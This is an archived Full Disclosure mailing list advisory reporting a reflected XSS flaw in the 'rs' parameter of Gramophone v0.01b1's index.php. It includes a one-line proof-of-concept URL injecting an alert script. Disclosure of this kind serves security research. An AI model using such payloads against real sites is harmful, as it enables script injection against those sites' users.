Full Disclosure mailing list archives
Gramophone v0.01b1 'rs' XSS
From: Thomas Richards <g13net () gmail com>
Date: Thu, 25 Oct 2012 08:32:10 -0400
# Exploit Title: Gramophone v0.01b1 'rs' XSS # Date: 10/25/12 # Author: G13 # Twitter: @g13net # Software Site: https://github.com/benbruscella/Gramophone # Version: 0.01b1 # Category: webapp (php) # ##### ToC ##### 0x01 Description 0x02 XSS 0x03 Vendor Notification ##### 0x01 Description ##### Gramophone is a music system used to catalog your music collection ##### 0x02 XSS ##### -----Vulnerability----- The 'rs' parameter on index.php is vulnerable to reflective cross site scripting -----PoC----- http://localhost/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E ##### 0x03 Vendor Notification ##### As per my policy, vulnerability has been released. http://www.g13net.com/vuln-disc.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Gramophone v0.01b1 'rs' XSS Thomas Richards (Oct 26)